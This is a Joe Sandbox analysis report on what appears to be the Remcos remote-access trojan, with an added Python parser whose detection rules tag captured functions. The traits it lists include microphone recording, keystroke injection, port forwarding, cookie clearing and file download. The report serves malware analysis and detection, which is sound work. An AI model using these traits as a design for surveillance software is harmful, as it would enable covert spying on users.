                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: tcp$udp
                                                                                                  • API String ID: 0-3725065008
                                                                                                  • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                  • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                  • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                  • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Eventinet_ntoa
                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                  • API String ID: 3578746661-168337528
                                                                                                  • Opcode ID: fe6851d6931ead13ffaa35775463c49c182512345669b2b1eae2850f81e7a572
                                                                                                  • Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
                                                                                                  • Opcode Fuzzy Hash: fe6851d6931ead13ffaa35775463c49c182512345669b2b1eae2850f81e7a572
                                                                                                  • Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EF0,00465FB4,?,00000000,00408037,00000000), ref: 00407A00
                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A48
                                                                                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00408037,00000000,?,?,0000000A,00000000), ref: 00407A88
                                                                                                  • MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
                                                                                                  • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AD0
                                                                                                  • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                    • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474F08,00404C49,00000000,?,?,00000000,00474F08,00404AC9), ref: 00404BA5
                                                                                                    • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                  • String ID: .part
                                                                                                  • API String ID: 1303771098-3499674018
                                                                                                  • Opcode ID: e7cafca0780e8310386d8ce0e2b4e9b02ff549ab184a3408e64b8b6c6c25ff2e
                                                                                                  • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                  • Opcode Fuzzy Hash: e7cafca0780e8310386d8ce0e2b4e9b02ff549ab184a3408e64b8b6c6c25ff2e
                                                                                                  • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                  APIs
                                                                                                  • _strftime.LIBCMT ref: 00401BD4
                                                                                                    • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                  • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401C86
                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                                                                                  • API String ID: 3809562944-3627046146
                                                                                                  • Opcode ID: 210fd9ba1251f706d0f6ced8dacb23af96e0d20cc0fe8c7829aa69d3c0beebe0
                                                                                                  • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                                                                                  • Opcode Fuzzy Hash: 210fd9ba1251f706d0f6ced8dacb23af96e0d20cc0fe8c7829aa69d3c0beebe0
                                                                                                  • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                                                                                  APIs
                                                                                                  • SendInput.USER32 ref: 00419A25
                                                                                                  • SendInput.USER32(00000001,?,0000001C,00000000), ref: 00419A4D
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A74
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419A92
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AB2
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AD7
                                                                                                  • SendInput.USER32(00000001,0000001C,0000001C), ref: 00419AF9
                                                                                                  • SendInput.USER32(00000001,00000000,0000001C), ref: 00419B1C
                                                                                                    • Part of subcall function 004199CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 004199D4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InputSend$Virtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1167301434-0
                                                                                                  • Opcode ID: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                  • Instruction ID: b6cba15de7ba168fc32b54cb564de1fb898aed6d56f2455a0f9f7e0387a20004
                                                                                                  • Opcode Fuzzy Hash: fc4380392ba50379eb6d472fb1d17d58296046c22f58e77cb3b57b5de18c14a3
                                                                                                  • Instruction Fuzzy Hash: 2431AE71218349A9E220DFA5DC41BDFBBECAF89B44F04080FF58457291CAA49D8C876B
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __freea$__alloca_probe_16_free
                                                                                                  • String ID: a/p$am/pm$h{D
                                                                                                  • API String ID: 2936374016-2303565833
                                                                                                  • Opcode ID: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                  • Instruction ID: c225e1f32c331ede1d29eb10815d0f52c76e58365e66366979e06629ded2ae5c
                                                                                                  • Opcode Fuzzy Hash: 4ddb7e6ff69264204235b909ea28f14837368a743d4617b198cabd7c05983ebc
                                                                                                  • Instruction Fuzzy Hash: 94D1E1719082068AFB299F68C845ABFB7B1EF05300F28455BE501AB351D73D9E43CBA9
                                                                                                  APIs
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  • _free.LIBCMT ref: 00444E87
                                                                                                  • _free.LIBCMT ref: 00444E9E
                                                                                                  • _free.LIBCMT ref: 00444EBD
                                                                                                  • _free.LIBCMT ref: 00444ED8
                                                                                                  • _free.LIBCMT ref: 00444EEF
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$AllocateHeap
                                                                                                  • String ID: KED
                                                                                                  • API String ID: 3033488037-2133951994
                                                                                                  • Opcode ID: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                                                  • Instruction ID: 6eb5fd97c930506827bd935ec23fdf2bd7e2f8155051dcdfd38a61b70e77380a
                                                                                                  • Opcode Fuzzy Hash: 4e35ff1e2d87e21165085a9225b40beb0941a1a7db736cbd5727a613c3eec6b7
                                                                                                  • Instruction Fuzzy Hash: 2351B371A00604ABEB20DF29CC42B6B77F4FF89724B25456EE809D7751E739E901CB98
                                                                                                  APIs
                                                                                                  • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,?,0044BBB1,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B47E
                                                                                                  • __fassign.LIBCMT ref: 0044B4F9
                                                                                                  • __fassign.LIBCMT ref: 0044B514
                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B53A
                                                                                                  • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B559
                                                                                                  • WriteFile.KERNEL32(?,?,00000001,0044BBB1,00000000,?,?,?,?,?,?,?,?,?,0044BBB1,?), ref: 0044B592
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 1324828854-0
                                                                                                  • Opcode ID: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                  • Instruction ID: 262f0c9efa3d8d05c94b564727faad167cb6e35c827a04fe4b8fb241bd644287
                                                                                                  • Opcode Fuzzy Hash: 311db8d3e4a1a0a231de64f74e89b34bd80b314b172ec9a4a2cdea1eea97895d
                                                                                                  • Instruction Fuzzy Hash: 2151B470A00249AFDB10CFA8D845AEEFBF8EF09304F14456BE955E7291E734D941CBA9
                                                                                                  APIs
                                                                                                  • __Init_thread_footer.LIBCMT ref: 004018BE
                                                                                                  • ExitThread.KERNEL32 ref: 004018F6
                                                                                                  • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EF0,00000000), ref: 00401A04
                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                                                                  • String ID: `kG$hMG$kG
                                                                                                  • API String ID: 1649129571-3851552405
                                                                                                  • Opcode ID: e7d59365cf8a2a51c340e4573cf07ad470a5e8a59a5c5c9771ed2099c48a02bd
                                                                                                  • Instruction ID: dc699b77c08b599092ddf19de7d80486fcd8c0a7edd7622242773fc29a9484b7
                                                                                                  • Opcode Fuzzy Hash: e7d59365cf8a2a51c340e4573cf07ad470a5e8a59a5c5c9771ed2099c48a02bd
                                                                                                  • Instruction Fuzzy Hash: 3441C2312042009BC324FB36DD96ABE73A6AB85354F00453FF54AA61F1DF38AD4AC61E
                                                                                                  APIs
                                                                                                    • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750F4), ref: 00413678
                                                                                                    • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                                                                    • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                  • _wcslen.LIBCMT ref: 0041B7F4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                                                                  • String ID: .exe$HSG$http\shell\open\command$program files (x86)\$program files\
                                                                                                  • API String ID: 37874593-930133217
                                                                                                  • Opcode ID: 98e5383603199a3ae91f152b580e0980a92f5ba97d9c345e2d64d7e8863b9e47
                                                                                                  • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                                                                                  • Opcode Fuzzy Hash: 98e5383603199a3ae91f152b580e0980a92f5ba97d9c345e2d64d7e8863b9e47
                                                                                                  • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
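The function records above are only useful in bulk once their API lists and string IDs are read together: WriteFile + MoveFileW with ".part" is a download-to-temp-then-rename routine, waveInAddBuffer with a strftime pattern and ".wav" is audio capture to timestamped files, the "StartForward"/"StartReverse" strings mark the port-forwarding handler, and RegQueryValueExW with "http\shell\open\command" resolves the default browser. The parser below is an added example, not Joe Sandbox or Remcos code: it reads records in the layout shown on this page (section header lines, "•" bullets, a record closed by its "Instruction Fuzzy Hash" line) and tags each one. The capability names in CAPABILITY_RULES and the rule combinations are this example's own assumptions, not Joe Sandbox signature names, and SAMPLE_REPORT is a constructed, shortened copy of three records from this page.

```python
"""Parse Joe Sandbox per-function records (APIs / Strings / Similarity blocks)
and tag each record with the capability its API+string combination implies.
Added example, not Joe Sandbox code; tag names below are hypothetical."""
import re
from dataclasses import dataclass, field

# "• CreateFileW.KERNEL32(...)", "• _free.LIBCMT ref: ...", and the indented
# "• Part of subcall function XXXXXXXX: send.WS2_32(...)" lines all match.
API_LINE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(\w+)\.(\w+)\b")

@dataclass
class FunctionRecord:
    opcode_id: str = ""
    apis: set = field(default_factory=set)        # e.g. {"MoveFileW", "send"}
    modules: set = field(default_factory=set)     # e.g. {"KERNEL32", "WS2_32"}
    strings: list = field(default_factory=list)   # "String ID" split on '$'
    source_file: str = ""

def parse_records(text):
    """Split report text into records; a record ends at its Instruction Fuzzy Hash."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if not line.startswith("•"):          # APIs / Strings / Similarity / ...
            section = line
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                cur.apis.add(m.group(1))
                cur.modules.add(m.group(2))
            continue
        key, _, value = line.lstrip("• ").partition(":")
        key, value = key.strip(), value.strip()
        if key == "Source File":
            cur.source_file = value.split(",")[0]
        elif key == "String ID":
            cur.strings = [s for s in value.split("$") if s]
        elif key == "Opcode ID":
            cur.opcode_id = value
        elif key == "Instruction Fuzzy Hash":
            records.append(cur)
            cur = FunctionRecord()
    return records

# Hypothetical rules: (tag, required APIs, required strings); all must be present.
CAPABILITY_RULES = (
    ("download_to_part_then_rename", {"WriteFile", "MoveFileW"}, {".part"}),
    ("audio_capture_to_wav", {"waveInAddBuffer"}, {".wav"}),
    ("keystroke_injection", {"SendInput"}, set()),
    ("tcp_port_forwarding", set(), {"StartForward", "StartReverse"}),
    ("default_browser_lookup", {"RegQueryValueExW"}, {r"http\shell\open\command"}),
)

def classify(rec):
    """Return the tags whose required APIs and strings all appear in rec."""
    return {tag for tag, apis, strs in CAPABILITY_RULES
            if apis <= rec.apis and strs <= set(rec.strings)}

def summarize(text):
    """Map opcode ID -> sorted tags for every record that matched a rule."""
    return {r.opcode_id: sorted(classify(r)) for r in parse_records(text) if classify(r)}

# Constructed sample: three records from this report, shortened.
SAMPLE_REPORT = """\
APIs
• WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
• MoveFileW.KERNEL32(00000000,00000000), ref: 00407AA5
• DeleteFileW.KERNEL32(00000000), ref: 00407AE0
Memory Dump Source
• Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• String ID: .part
• Opcode ID: e7cafca0780e8310386d8ce0e2b4e9b02ff549ab184a3408e64b8b6c6c25ff2e
• Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
APIs
• _strftime.LIBCMT ref: 00401BD4
• waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
Similarity
• String ID: %Y-%m-%d %H.%M$.wav$tMG
• Opcode ID: 210fd9ba1251f706d0f6ced8dacb23af96e0d20cc0fe8c7829aa69d3c0beebe0
• Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
APIs
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
• Opcode ID: fe6851d6931ead13ffaa35775463c49c182512345669b2b1eae2850f81e7a572
• Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
"""

if __name__ == "__main__":
    for opcode_id, tags in summarize(SAMPLE_REPORT).items():
        print(opcode_id[:16], tags)
```

Feed the whole Execution Graph text of the report to `summarize` to get a per-function capability table keyed by Opcode ID; the `source_file` field keeps the memory-dump name so matches can be traced back to the injected AddInProcess32 image.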
                                                                                                  APIs
                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                                                                  • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                  • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                  • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                  • API String ID: 1133728706-4073444585
                                                                                                  • Opcode ID: 54b94032e9b78d2850e67281325c2d043173ec5e1355e0856bf4db78674b4992
                                                                                                  • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                                                                                  • Opcode Fuzzy Hash: 54b94032e9b78d2850e67281325c2d043173ec5e1355e0856bf4db78674b4992
                                                                                                  • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                                                                  • Instruction ID: d4e598e7927038c57750db0ba161657e9615562456f8c919f0676739ef068bdb
                                                                                                  • Opcode Fuzzy Hash: 6348a53403ba44e76667cab5d3d4b8c4f90ca5e92cff7b4211fa09d26e343de5
                                                                                                  • Instruction Fuzzy Hash: 931127B2504214BBEB216F768C05D1F7A5CEB86726B52062EFD55C7292DA3CCC0186A8
                                                                                                  APIs
                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                                                                                  • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000,00000024), ref: 00401B13
                                                                                                  • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                                                                                  • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                                                                                  • waveInStart.WINMM ref: 00401B82
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                  • String ID: tMG
                                                                                                  • API String ID: 1356121797-30866661
                                                                                                  • Opcode ID: ddb26006271a9d09e5c3e06fd94c49a09c7a5bd56704e6a9c07e47a6c47e01e4
                                                                                                  • Instruction ID: cbef553d477d36f78321a165484ecc4410fcecc505b8f9aca62d01b994c6c3e6
                                                                                                  • Opcode Fuzzy Hash: ddb26006271a9d09e5c3e06fd94c49a09c7a5bd56704e6a9c07e47a6c47e01e4
                                                                                                  • Instruction Fuzzy Hash: 8E2148716042019FC7299F6AEE09A697BAAFB84711B04403EE10DD76F1DBF848C5CB2C
                                                                                                  APIs
                                                                                                    • Part of subcall function 00450CC1: _free.LIBCMT ref: 00450CEA
                                                                                                  • _free.LIBCMT ref: 00450FC8
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 00450FD3
                                                                                                  • _free.LIBCMT ref: 00450FDE
                                                                                                  • _free.LIBCMT ref: 00451032
                                                                                                  • _free.LIBCMT ref: 0045103D
                                                                                                  • _free.LIBCMT ref: 00451048
                                                                                                  • _free.LIBCMT ref: 00451053
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                  • Instruction ID: 345e916fd15b447c36d88a7a8914fd19e4c3e0710e9d23c2e9f19f8556552687
                                                                                                  • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                  • Instruction Fuzzy Hash: C111D231402704AAE621BB72CC03FCB779CAF03304F454D2EBEA967153C7ACB4185654
                                                                                                  APIs
                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004111AB
                                                                                                  • int.LIBCPMT ref: 004111BE
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                    • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004111FE
                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00411207
                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00411225
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                  • String ID: 8mG
                                                                                                  • API String ID: 2536120697-3990007011
                                                                                                  • Opcode ID: d6f56902d4e8762935de702d4c1b953921ac7c6d7eb456f7c36ab316a66f2fb3
                                                                                                  • Instruction ID: 3a14b803bc510f5ed1108d30ac07207671fc4f07faef22c9ffd8c11cb1ae2def
                                                                                                  • Opcode Fuzzy Hash: d6f56902d4e8762935de702d4c1b953921ac7c6d7eb456f7c36ab316a66f2fb3
                                                                                                  • Instruction Fuzzy Hash: D3112332900124A7CB14EBAAD8018DEBBA99F44364F11456FFE04B72E1DB789E41CBD8
                                                                                                  APIs
                                                                                                    • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                    • Part of subcall function 004135E1: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                    • Part of subcall function 004135E1: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 00413622
                                                                                                    • Part of subcall function 004135E1: RegCloseKey.ADVAPI32(?), ref: 0041362D
                                                                                                  • StrToIntA.SHLWAPI(00000000,0046CA08,00000000,00000000,00000000,004750F4,00000003,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0041B3CD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                  • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                  • API String ID: 1866151309-2070987746
                                                                                                  • Opcode ID: e319b20e713963962fae3f4f0dede7e3a320de8ef4d9594bff63017ef53802f1
                                                                                                  • Instruction ID: 99e2d84e4b8fa31c947f893a9fcbf762d6d1118dcb79bce5eaccee633664c5dc
                                                                                                  • Opcode Fuzzy Hash: e319b20e713963962fae3f4f0dede7e3a320de8ef4d9594bff63017ef53802f1
                                                                                                  • Instruction Fuzzy Hash: 0311C47064414926C700F7659C97BFF76198B80304F94453BF806A71D3FB6C598683EE
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,?,0043A3D1,0043933E), ref: 0043A3E8
                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A3F6
                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A40F
                                                                                                  • SetLastError.KERNEL32(00000000,?,0043A3D1,0043933E), ref: 0043A461
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                  • String ID:
                                                                                                  • API String ID: 3852720340-0
                                                                                                  • Opcode ID: f8b088146f32705476b05de113eddff258cc1bfa1c523dc592fb57b9cb9462fc
